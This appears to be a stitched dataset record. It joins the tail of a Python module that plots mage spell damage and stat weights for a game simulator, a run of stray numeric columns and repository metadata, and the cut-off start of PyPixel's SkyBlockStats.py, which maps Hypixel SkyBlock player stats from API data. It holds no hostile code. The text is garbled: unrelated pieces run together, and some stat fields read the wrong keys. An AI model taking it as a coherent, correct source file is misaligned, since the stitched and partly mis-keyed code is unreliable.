'XYylabel', 'type': 'radio:text', 'texts': ['Counts', 'Intensity'], 'tab': 0, 'row': 2,'default': 0} , return buttons import copy def get_dmg(mage, buffs,times): new_stats_0 = copy.deepcopy(mage.stats) new_talents = copy.deepcopy(mage.talents) bck.buff_me(new_stats_0, new_talents, buffs) spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) if mage.save_rot[0] == 'arcane_frost_clearcasting_optimized': save_rot = bck.get_dps_mps_rot_clearcasting_optimal(new_stats_0, new_talents, bck.game_config, spells_to_cast = 20000) elif mage.save_rot[0] == 'fireball_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['fireball_13_one_tick']]*7 optimized_spells.append(spells_no_c['fireball_13_one_tick_one_roll']) 
optimized_spells.append(spells_no_c['fireball_13_three_tick_no_roll']) optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) elif mage.save_rot[0] == 'scorch_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['scorch_9']]*7 optimized_spells.append(spells_no_c['scorch_9_no_roll']) optimized_spells.append(spells_no_c['scorch_9_no_roll']) optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) elif mage.save_rot[0] == 'frostbolt_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['frostbolt_13']]*9 optimized_spells.append(spells_forced_c['arcane_missiles_10']) save_rot = bck.get_dps_mps_rotation(optimized_spells) else: save_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.save_rot]) if mage.burn_rot[0] == 'None': burn_rot = [0,10**10] elif mage.burn_rot[0] == 'AB_spam_clearcasting_optimized': new_talents['force_clearcasting'] = -1 spells_no_c, stats_no_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 1 spells_forced_c, stats_forced_c = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) new_talents['force_clearcasting'] = 0 # reset optimized_spells = [spells_no_c['arcane_blast_1_3speed_3mana']]*9 
optimized_spells.append(spells_forced_c['arcane_missiles_10']) burn_rot = bck.get_dps_mps_rotation(optimized_spells) else: burn_rot = bck.get_dps_mps_rotation([spells[x] for x in mage.burn_rot]) IV_replace = None if 'arcane_frost_clearcasting_optimized' in mage.save_rot or 'arcane_blast_1_3speed_0mana' in mage.save_rot: #print(mage.location) IV_replace = bck.get_dps_mps_rotation([spells[x] for x in ['frostbolt_13']]) dmg, dmg_burn, dmg_save, dmg_other, time_shift = bck.optimize_cycles_return_damage(new_stats,times,new_talents, burn_rot, save_rot, return_fractions=True, IV_replace=IV_replace ) return dmg, dmg_burn, dmg_save, dmg_other, time_shift def plot_dps(ui, mage, buffs, i, linestyle, ax, misc, fractions = False, DMG = False): times = np.arange(ui['time_min'],ui['time_max']+1, 1) dmg, dmg_burn, dmg_save, dmg_other, time_shift = get_dmg(mage, buffs, times) if DMG: times_mod = 1 ax.set_ylabel('Damage [DMG]') #ax.set_ylim([u,ui['dps_max']]) else: times_mod = times ax.set_ylabel('Average dps [DMG/s]') ax.set_ylim([ui['dps_min'],ui['dps_max']]) if fractions: if not 'dmg_frac_label' in misc: misc.append('dmg_frac_label') ax.fill_between(times, np.zeros(len(times)), dmg_save/times_mod, color=[0.5,0,1,0.2], label = 'save') ax.fill_between(times, dmg_save/times_mod, dmg_save/times_mod+dmg_burn/times_mod, color=[1,0,0.5,0.2], label = 'burn') else: ax.fill_between(times, np.zeros(len(times)), dmg_save/times_mod, color=[0.5,0,1,0.2]) ax.fill_between(times, dmg_save/times_mod, dmg_save/times_mod+dmg_burn/times_mod, color=[1,0,0.5,0.2]) if np.sum(dmg_other)>1000: if not 'dmg_frac_other_label' in misc: misc.append('dmg_frac_other_label') ax.fill_between(times, dmg_save/times_mod+dmg_burn/times_mod, dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod, color=[0,0,0,0.2], label = 'other (pom+pyro, etc)') else: ax.fill_between(times, dmg_save/times_mod+dmg_burn/times_mod, dmg_save/times_mod+dmg_burn/times_mod+dmg_other/times_mod, color=[0,0,0,0.2]) ax.plot(times, 
dmg/times_mod, linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.set_xlabel('Total casting time before boss dead [s]') '''ax.annotate('Evocation', xy=(43, 1100), xytext=(48, 1400), arrowprops=dict(facecolor='black', shrink=0.05), horizontalalignment='left', verticalalignment='top', ) ax.annotate('OOM', xy=(110, 800), xytext=(120,1100), arrowprops=dict(facecolor='black', shrink=0.05), horizontalalignment='left', verticalalignment='top', )''' ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']]) ylim = ax.get_ylim() if ylim[0]<0: ax.set_ylim([0,ylim[1]]) #fig.savefig('optimized_spam.png') return misc def plot_spell_dps(ui, mages, buff_cases, linestyles, ax, DPM = False): #ax.grid() spell_names = ['frostbolt_13','fireball_13_one_tick', 'scorch_9', 'arcane_blast_1_0speed_0mana', 'arcane_blast_1_1speed_1mana', 'arcane_blast_1_2speed_2mana', 'arcane_blast_1_3speed_3mana', 'arcane_blast_1_3speed_0mana', 'arcane_missiles_10', ] x = np.arange(len(spell_names)) tot_cases = 0 for i, buff_case in enumerate(buff_cases): if buff_case['check'] == 1: tot_cases+=len(mages) j=0 width = 0.8/(tot_cases) for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in mages: new_stats_0 = copy.deepcopy(mage.stats) new_talents = copy.deepcopy(mage.talents) bck.buff_me(new_stats_0, new_talents, buff_case) spells, new_stats = bck.get_spells_stats(new_stats_0, new_talents, bck.game_config) dpms = [] dpss = [] for spell_name in spell_names: dps = spells[spell_name].average_damage / spells[spell_name].actual_cast_time dpss.append(dps) dpm = spells[spell_name].average_damage / spells[spell_name].actual_mana dpms.append(dpm) offset = -0.8/2+(j+0.5)*0.8/(tot_cases) color = [mage.color[0], mage.color[1], mage.color[2],0.5] edgecolor = [mage.color[0], mage.color[1], mage.color[2],1] if not DPM: rects = ax.bar(x +offset, dpss, 
width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label) else: rects = ax.bar(x +offset, dpms, width, linestyle=linestyle, edgecolor= edgecolor, color=color, label=mage.label) #rects = ax[1].bar(x +offset, dpms, width, color=mage.color, label=mage.label) j+=1 if not DPM: ax.set_ylabel('spell dps') else: ax.set_ylabel('spell dpm') #ax.set_ylabel('spell dpm') spell_names_short = ['Frostbolt', 'Fireball', 'Scorch', 'AB0', 'AB1', 'AB2', 'AB3', 'AB3\ncost1', 'AM', ] ax.set_xticks(np.arange(0,len(spell_names_short),1)) ax.set_xticklabels(spell_names_short) #ax[1].legend() #fig.tight_layout() return def plot_stat_weights(ui, mages, buff_cases, linestyles, ax, DPM = False): stats_list = ['intellect','common_spell_damage', 'crit_rating','hit_rating','haste_rating','mp5','spirit'] stats_names = ['Intellect','+Spelldamage','Crit rating', 'Hit rating','Haste','mp5','Spirit'] x_step = ui['time_max']-ui['time_min'] xlim = [ui['time_min'],ui['time_max']+3*x_step] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: for mage in mages: tmp = get_dmg(mage, buff_case, times) dps_0 = tmp[0]/times xo=-x_step yo=max_ylim for i, stat in enumerate(stats_list): if i==4: xo=0 yo-=max_ylim else: xo+=x_step mage.stats[stat]-=10 #print('arcane') out = get_dmg(mage, buff_case, times) dps_new = out[0]/times mage.stats[stat]+=10 fraction_increase_per_stat = -0.1*(dps_new/dps_0-1) #stat_per_percent_fire[stat_per_percent_fire<0]=np.nan #stat_per_percent_fire[stat_per_percent_fire>max_ylim]=np.nan stat_per_percent = 0.01/fraction_increase_per_stat y= 20/stat_per_percent y[y<-0.0001] = np.nan y[y>max_ylim] = np.nan ax.plot(times+xo,y+yo,linestyle= linestyle,color=mage.color) xo=-x_step yo=max_ylim for i, stat in enumerate(stats_list): if i==4: xo=0 yo-=max_ylim else: xo+=x_step ax.text(xo+xlim[0]+0.05*x_step, yo+max_ylim-0.05*max_ylim, 
stats_names[i],ha='left', va='top') ax.set_xlim(xlim) ax.set_ylim([0,2*max_ylim]) ax.set_xticks([]) ax.set_yticks(np.arange(max_ylim*4)/2) ax.set_yticklabels(np.arange(max_ylim*4)/2%max_ylim) ax.plot(xlim, [max_ylim,max_ylim], lw=0.5,color=[0,0,0,1]) ax.grid() for i in range(1,4): ax.plot([xlim[0]+x_step*i]*2, [0,max_ylim*2], lw=0.5,color=[0,0,0,1]) x_ticks_0 = np.arange((int((times[0]-1)/30)+1)*30,times[-1],30) x_ticks = [] for i in range(4): for x in x_ticks_0: x_ticks.append(x+i*x_step) ax.set_xticks(ticks=x_ticks) x_ticks = [] for i in range(4): for x in x_ticks_0: x_ticks.append(int(x)) ax.set_xticklabels(x_ticks) ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('Stat weight [-]') '''axes[i].set_title(stats_names[i]) axes[i].set_ylim([0,max_ylim]) axes[i].set_yticks([0,1,2,3,4,5]) axes[i].grid() axes[i].set_xlim([20,180])''' #axes[-1].set_axis_off() #fig.suptitle('Stat weights') #fig.tight_layout() def plot_compare_buff_states(ui, mages, buff_cases, linestyles, ax): xlim = [ui['time_min'],ui['time_max']] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] ax.plot(times, np.zeros(times.shape), color=[0,0,0,1]) for mage in mages: done_first = 0 for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: if done_first ==0: tmp = get_dmg(mage, buff_case, times) dps_0 = tmp[0]/times done_first = 1 label_0 = ui['buff_case_'+str(i)+'_label'] else: tmp = get_dmg(mage, buff_case, times) dps_1 = tmp[0]/times ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('% damage increase vs '+label_0) ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']]) ax.grid() def set_default_mage(event): frame = event.widget while not hasattr(frame,'nav'): frame = 
frame.master frame.nav.clear_color('color3') frame.nav.color_selected('color3') mages = frame.nav.get_paths_of_selected_items() if len(mages)>0: frame.default_mage = frame.nav.get_paths_of_selected_items()[0] print('set default_mage:',frame.default_mage ) else: delattr(frame,'default_mage') print('cleared default_mage' ) frame.nav.deselect() def plot_compare_mages(ui, default_mage, mages, buff_cases, linestyles, ax): xlim = [ui['time_min'],ui['time_max']] times = np.arange(ui['time_min'],ui['time_max']+1, 1) max_ylim = ui['stat_weight_ymax'] ax.plot(times, np.zeros(times.shape), color=default_mage.color) for i, buff_case in enumerate(buff_cases): linestyle = linestyles[i] if buff_case['check'] == 1: tmp = get_dmg(default_mage, buff_case, times) dps_0 = tmp[0]/times for mage in mages: if mage.location == default_mage.location: continue tmp = get_dmg(mage, buff_case, times) dps_1 = tmp[0]/times ax.plot(times, 100*(dps_1/dps_0-1), linestyle= linestyle, color=mage.color, label = mage.label+', '+ui['buff_case_'+str(i)+'_label']) ax.set_xticks(ticks=np.arange((int((times[0]-1)/30)+1)*30,times[-1]+1,30)) ax.grid() ax.set_xlabel('Total casting time before boss dead [s]') ax.set_ylabel('% damage increase vs '+default_mage.label) ax.legend() ax.set_xlim([ui['time_min'],ui['time_max']])
42.406176
183
0.651711
5,561
35,706
3.936342
0.073548
0.025582
0.019598
0.035496
0.721243
0.65651
0.639242
0.588305
0.555642
0.509137
0
0.028567
0.154904
35,706
841
184
42.456599
0.696868
0.074245
0
0.413649
0
0
0.239812
0.055903
0
0
0
0
0
1
0.019499
false
0
0.011142
0
0.041783
0.008357
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
bdb9e345a7126b6fc13fd0106c741d7ab14d3f93
36,682
py
Python
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
2
2021-03-25T16:52:22.000Z
2021-09-22T16:42:57.000Z
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
null
null
null
PyPixel/SkyBlockStats.py
M4axim/PyPixel
8f77773a6e4c1541a41c98fd8edb86b4bb2aba67
[ "MIT" ]
2
2021-03-23T18:40:19.000Z
2022-01-03T18:17:08.000Z
# -*- coding: utf-8 -*- """ MIT License Copyright (c) 2021 plun1331 Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """ import datetime from .utils import SkyBlockUtils types = {'zombie': SkyBlockUtils.zombieSlayer, 'spider': SkyBlockUtils.spiderSlayer, 'wolf': SkyBlockUtils.wolfSlayer} class SkyBlockStats(object): r"""Represents a player's SkyBlock Statistics. :param stats: The player's stats from their memberdata retrieved from the API. 
:type stats: dict""" def __init__(self, stats: dict): self.top_crit_damage = stats['highest_crit_damage'] if 'highest_crit_damage' in stats else None self.kills = int(stats['kills']) if 'kills' in stats else None self.zombie_kills = int(stats['kills_zombie']) if 'kills_zombie' in stats else None self.bids = int(stats['auctions_bids']) if 'auctions_bids' in stats else None self.highest_bid = stats['auctions_highest_bid'] if 'auctions_highest_bid' in stats else None self.zombie_villager_kills = int(stats['kills_zombie_villager']) if 'kills_zombie_villager' in stats else None self.skeleton_kills = int(stats['kills_skeleton']) if 'kills_skeleton' in stats else None self.spider_kills = int(stats['kills_spider']) if 'kills_spider' in stats else None self.enderman_kills = int(stats['kills_enderman']) if 'kills_enderman' in stats else None self.deaths = int(stats['deaths']) if 'deaths' in stats else None self.zombie_deaths = int(stats['deaths_zombie']) if 'deaths_zombie' in stats else None self.void_deaths = int(stats['deaths']) if 'deaths' in stats else None self.skeleton_deaths = int(stats['deaths_skeleton']) if 'deaths_skeleton' in stats else None self.fire_deaths = int(stats['deaths_fire']) if 'deaths_fire' in stats else None self.auctions_won = int(stats['auctions_won']) if 'auctions_won' in stats else None self.uncommon_auctions_bought = int( stats['auctions_bought_uncommon']) if 'auctions_bought_uncommon' in stats else None self.auctions_gold_spent = int(stats['auctions_gold_spent']) if 'auctions_gold_spent' in stats else None self.auctions_created = int(stats['auctions_created']) if 'auctions_created' in stats else None self.auction_fees_spent = int(stats['auctions_fees']) if 'auctions_fees' in stats else None self.player_deaths = int(stats['deaths_player']) if 'deaths_player' in stats else None self.auctions_completed = int(stats['auctions_completed']) if 'auctions_completed' in stats else None self.uncommon_auctions_sold = int( stats['auctions_sold_uncommon']) if 
'auctions_sold_uncommon' in stats else None self.auction_gold_earned = int(stats['auctions_gold_earned']) if 'auctions_gold_earned' in stats else None self.invisible_creeper_kills = int( stats['kills_invisible_creeper']) if 'kills_invisible_creeper' in stats else None self.emerald_slime_kills = int(stats['kills_emerald_slime']) if 'kills_emerald_slime' in stats else None self.diamond_zombie_kills = int(stats['kills_diamond_zombie']) if 'kills_diamond_zombie' in stats else None self.diamond_skeleton_deaths = int( stats['deaths_diamond_skeleton']) if 'deaths_diamond_skeleton' in stats else None self.diamond_zombie_deaths = int(stats['deaths_diamond_zombie']) if 'deaths_diamond_zombie' in stats else None self.diamond_skeleton_kills = int( stats['kills_diamond_skeleton']) if 'kills_diamond_skeleton' in stats else None self.lapis_zombie_kills = int(stats['kills_lapis_zombie']) if 'kills_lapis_zombie' in stats else None self.emerald_slime_deaths = int(stats['deaths_emerald_slime']) if 'deaths_emerald_slime' in stats else None self.redstone_pigman_kills = int(stats['kills_redstone_pigman']) if 'kills_redstone_pigman' in stats else None self.redstone_pigman_deaths = int( stats['deaths_redstone_pigman']) if 'deaths_redstone_pigman' in stats else None self.splitter_spider_silverfish_kills = int( stats['kills_splitter_spider_silverfish']) if 'kills_splitter_spider_silverfish' in stats else None self.jockey_shot_silverfish_kills = int( stats['kills_jockey_shot_silverfish']) if 'kills_jockey_shot_silverfish' in stats else None self.wither_skeleton_kills = int(stats['kills_wither_skeleton']) if 'kills_wither_skeleton' in stats else None self.magma_cube_kills = int(stats['kills_magma_cube']) if 'kills_magma_cube' in stats else None self.magma_cube_fireball_kills = int( stats['kills_fireball_magma_cube']) if 'kills_fireball_magma_cube' in stats else None self.cow_kills = int(stats['kills_cow']) if 'kills_cow' in stats else None self.pig_kills = int(stats['kills_pig']) if 
'kills_pig' in stats else None self.items_fished = int(stats['items_fished']) if 'items_fished' in stats else None self.normal_items_fished = int(stats['items_fished_normal']) if 'items_fished_normal' in stats else None self.treasure_items_fished = int(stats['items_fished_treasure']) if 'items_fished_treasure' in stats else None self.common_auctions_bought = int( stats['auctions_bought_common']) if 'auctions_bought_common' in stats else None self.witch_kills = int(stats['kills_witch']) if 'kills_witch' in stats else None self.spider_deaths = int(stats['deaths_spider']) if 'deaths_spider' in stats else None self.epic_auctions_bought = int(stats['auctions_bought_epic']) if 'auctions_bought_epic' in stats else None self.magma_cube_fireball_deaths = int( stats['deaths_fireball_magma_cube']) if 'deaths_fireball_magma_cube' in stats else None self.weaver_spider_kills = int(stats['kills_weaver_spider']) if 'kills_weaver_spider' in stats else None self.splitter_spider_kills = int(stats['kills_splitter_spider']) if 'kills_splitter_spider' in stats else None self.jockey_skeleton_kills = int(stats['kills_jockey_skeleton']) if 'kills_jockey_skeleton' in stats else None self.spider_jockey_kills = int(stats['kills_spider_jockey']) if 'kills_spider_jockey' in stats else None self.dasher_spider_kills = int(stats['kills_dasher_spider']) if 'kills_dasher_spider' in stats else None self.spider_jockey_deaths = int(stats['deaths_spider_jockey']) if 'deaths_spider_jockey' in stats else None self.dasher_spider_deaths = int(stats['deaths_dasher_spider']) if 'deaths_dasher_spider' in stats else None self.jockey_shot_silverfish_deaths = int( stats['deaths_jockey_shot_silverfish']) if 'deaths_jockey_shot_silverfish' in stats else None self.splitter_spider_deaths = int( stats['deaths_splitter_spider']) if 'deaths_splitter_spider' in stats else None self.common_auctions_sold = int(stats['auctions_sold_common']) if 'auctions_sold_common' in stats else None self.no_bid_auctions = 
int(stats['auctions_no_bids']) if 'auctions_no_bids' in stats else None self.ghast_kills = int(stats['kills_ghast']) if 'kills_ghast' in stats else None self.rare_auctions_sold = int(stats['auctions_sold_rare']) if 'auctions_sold_rare' in stats else None self.epic_auctions_sold = int(stats['auctions_sold_epic']) if 'auctions_sold_epic' in stats else None self.magma_cube_boss_deaths = int( stats['deaths_magma_cube_boss']) if 'deaths_magma_cube_boss' in stats else None self.blaze_kills = int(stats['kills_blaze']) if 'kills_blaze' in stats else None self.wither_skeleton_deaths = int( stats['deaths_wither_skeleton']) if 'deaths_wither_skeleton' in stats else None self.magma_cube_deaths = int(stats['deaths_magma_cube']) if 'deaths_magma_cube' in stats else None self.respawning_skeleton_kills = int( stats['kills_respawning_skeleton']) if 'kills_respawning_skeleton' in stats else None self.fall_deaths = int(stats['deaths_fall']) if 'deaths_fall' in stats else None self.rare_auctions_bought = int(stats['auctions_bought_rare']) if 'auctions_bought_rare' in stats else None self.rabbit_kills = int(stats['kills_rabbit']) if 'kills_rabbit' in stats else None self.sheep_kills = int(stats['kills_sheep']) if 'kills_sheep' in stats else None self.pigman_kills = int(stats['kills_pigman']) if 'kills_pigman' in stats else None self.player_kills = int(stats['kills_player']) if 'kills_player' in stats else None self.ruin_wolf_kills = int(stats['kills_ruin_wolf']) if 'kills_ruin_wolf' in stats else None self.night_respawning_skeleton_kills = int( stats['kills_night_respawining_skeleton']) if 'kills_night_respawining_skeleton' in stats else None self.legendary_auctions_bought = int( stats['auctions_bought_legendary']) if 'auctions_bought_legendary' in stats else None self.chicken_kills = int(stats['kills_chicken']) if 'kills_chicken' in stats else None self.respawning_skeleton_deaths = int( stats['deaths_respawning_skeleton']) if 'deaths_respawning_skeleton' in stats else None 
self.ruin_wolf_deaths = int(stats['deaths_ruin_wolf']) if 'deaths_ruin_wolf' in stats else None self.unburried_zombie_deaths = int( stats['deaths_unburied_zombie']) if 'deaths_unburied_zombie' in stats else None self.unburried_zombie_kills = int( stats['kills_unburried_zombie']) if 'kills_unburried_zombie' in stats else None self.enderman_deaths = int(stats['deaths_enderman']) if 'deaths_enderman' in stats else None self.endermite_deaths = int(stats['deaths_endermite']) if 'deaths_endermite' in stats else None self.endermite_kills = int(stats['kills_endermite']) if 'kills_endermite' in stats else None self.zealot_enderman_deaths = int( stats['deaths_zealot_enderman']) if 'deaths_zealot_enderman' in stats else None self.wise_dragon_deaths = int(stats['deaths_wise_dragon']) if 'deaths_wise_dragon' in stats else None self.watcher_deaths = int(stats['deaths_watcher']) if 'deaths_watcher' in stats else None self.watcher_kills = int(stats['kills_watcher']) if 'kills_watcher' in stats else None self.random_slime_kills = int(stats['kills_random_slime']) if 'kills_random_slime' in stats else None self.voracious_spider_kills = int( stats['kills_voracious_spider']) if 'kills_voracious_spider' in stats else None self.wolf_deaths = int(stats['deaths_wolf']) if 'deaths_wolf' in stats else None self.old_wolf_kills = int(stats['kills_old_wolf']) if 'kills_old_wolf' in stats else None self.olf_wolf_deaths = int(stats['deaths_old_wolf']) if 'deaths_old_wolf' in stats else None self.zealot_enderman_kills = int(stats['kills_zealot_enderman']) if 'kills_zealot_enderman' in stats else None self.obsidian_wither_kills = int(stats['kills_obsidian_wither']) if 'kills_obsidian_wither' in stats else None self.howling_spirit_kills = int(stats['kills_howling_spirit']) if 'kills_howling_spirit' in stats else None self.howling_spirit_deaths = int(stats['deaths_howling_spirit']) if 'deaths_howling_spirit' in stats else None self.unknown_deaths = int(stats['deaths_unknown']) if 'deaths_unknown' in 
stats else None self.sea_walker_kills = int(stats['kills_sea_walker']) if 'kills_sea_walker' in stats else None self.pond_squid_kills = int(stats['kills_pond_squid']) if 'kills_pond_squid' in stats else None self.sea_guardian_kills = int(stats['deaths_sea_guardian']) if 'deaths_sea_guardian' in stats else None self.sea_archer_kills = int(stats['kills_sea_archer']) if 'kills_sea_archer' in stats else None self.young_dragon_deaths = int(stats['deaths_young_dragon']) if 'deaths_young_dragon' in stats else None self.zombie_deep_kills = int(stats['kills_zombie_deep']) if 'kills_zombie_deep' in stats else None self.gifts_given = int(stats['gifts_given']) if 'gifts_given' in stats else None self.gifts_recieved = int(stats['gifts_recieved']) if 'gifts_recieved' in stats else None self.frozen_steve_deaths = int(stats['deaths_frozen_steve']) if 'deaths_frozen_steve' in stats else None self.brood_mother_spider_kills = int( stats['kills_brood_mother_spider']) if 'kills_brood_mother_spider' in stats else None self.brood_mother_cave_spider_kills = int( stats['kills_brood_mother_cave_spider']) if 'kills_brood_mother_cave_spider' in stats else None self.foraging_race_best_time = int( stats['foraging_race_best_time']) if 'foraging_race_best_time' in stats else None self.legendary_auctions_sold = int( stats['auctions_sold_legendary']) if 'auctions_sold_legendary' in stats else None self.special_auctions_sold = int(stats['auctions_sold_special']) if 'auctions_sold_special' in stats else None self.generator_magma_cube_kills = int( stats['kills_generator_magma_cube']) if 'kills_generator_magma_cube' in stats else None self.bat_pinata_kills = int(stats['kills_bat_pinata']) if 'kills_bat_pinata' in stats else None self.special_auctions_bought = int( stats['auctions_bought_special']) if 'auctions_bought_special' in stats else None self.horseman_zombie_kills = int(stats['kills_horseman_zombie']) if 'kills_horseman_zombie' in stats else None self.old_dragon_deaths = 
int(stats['deaths_old_dragon']) if 'deaths_old_dragon' in stats else None self.liquid_hot_magma_deaths = int( stats['deaths_liquid_hot_magma']) if 'deaths_liquid_hot_magma' in stats else None self.liquid_hot_magma_kills = int( stats['kills_liquid_hot_magma']) if 'kills_liquid_hot_magma' in stats else None self.most_winter_snowballs_hit = int( stats['most_winter_snowballs_hit']) if 'most_winter_snowballs_hit' in stats else None self.most_winter_damage_dealt = int( stats['most_winter_damage_dealt']) if 'most_winter_damage_dealt' in stats else None self.most_winter_magma_damage_dealt = int( stats['most_winter_magma_damage_dealt']) if 'most_winter_magma_damage_dealt' in stats else None self.ender_crystals_destroyed = int( stats['ender_crystals_destroyed']) if 'ender_crystals_destroyed' in stats else None self.most_winter_cannonballs_hit = int( stats['most_winter_cannonballs_hit']) if 'most_winter_cannonballs_hit' in stats else None self.slime_kills = int(stats['kills_slime']) if 'kills_slime' in stats else None self.unstable_dragon_deaths = int( stats['deaths_unstable_dragon']) if 'deaths_unstable_dragon' in stats else None self.superior_dragon_deaths = int( stats['deaths_superior_dragon']) if 'deaths_superior_dragon' in stats else None self.forest_island_bat_kills = int( stats['kills_forest_island_bat']) if 'kills_forest_island_bat' in stats else None self.strong_dragon_deaths = int(stats['deaths_strong_dragon']) if 'deaths_strong_dragon' in stats else None self.pet_milestone_ores_mined = int( stats['pet_milestone_ores_mined']) if 'pet_milestone_ores_mined' in stats else None self.pet_milestone_sea_creatures_killed = int( stats['pet_milestone_sea_creatures_killed']) if 'pet_milestone_sea_creatures_killed' in stats else None self.chicken_deep_kills = int(stats['kills_chicken_deep']) if 'kills_chicken_deep' in stats else None self.corrupted_protector_deaths = int( stats['deaths_corrupted_protector']) if 'deaths_corrupted_protector' in stats else None 
self.pack_spirit_kills = int(stats['kills_pack_spirit']) if 'kills_pack_spirit' in stats else None self.soul_of_the_alpha_kills = int( stats['kills_soul_of_the_alpha']) if 'kills_soul_of_the_alpha' in stats else None self.frosty_the_snowman_kills = int( stats['kills_frosty_the_snowman']) if 'kills_frosty_the_snowman' in stats else None self.frozen_steve_kills = int(stats['kills_frozen_steve']) if 'kills_frozen_steve' in stats else None self.catfish_kills = int(stats['kills_catfish']) if 'kills_catfish' in stats else None self.dungeon_hub_crystal_core_anything_no_return_best_time = stats[ 'dungeon_hub_crystal_core_anything_no_return_best_time' ] if 'dungeon_hub_crystal_core_anything_no_return_best_time' in stats else None self.dungeon_hub_giant_mushroom_anything_no_return_best_time = stats[ 'dungeon_hub_giant_mushroom_anything_no_return_best_time' ] if 'dungeon_hub_giant_mushroom_anything_no_return_best_time' in stats else None self.dungeon_hub_giant_mushroom_no_pearls_no_return_best_time = stats[ 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' ] if 'dungeon_hub_giant_mushroom_no_pearls_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_anything_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_anything_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_anything_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_nothing_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_nothing_no_return_best_time' in stats else None self.dungeon_hub_precursor_ruins_no_pearls_no_return_best_time = stats[ 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' ] if 'dungeon_hub_precursor_ruins_no_pearls_no_return_best_time' in stats else None self.crypt_lurker_kills = int(stats['kills_crypt_lurker']) if 'kills_crypt_lurker' in stats else None self.dungeon_respawning_skeleton_kills = int( stats['kills_dungeon_respawning_skeleton']) if 
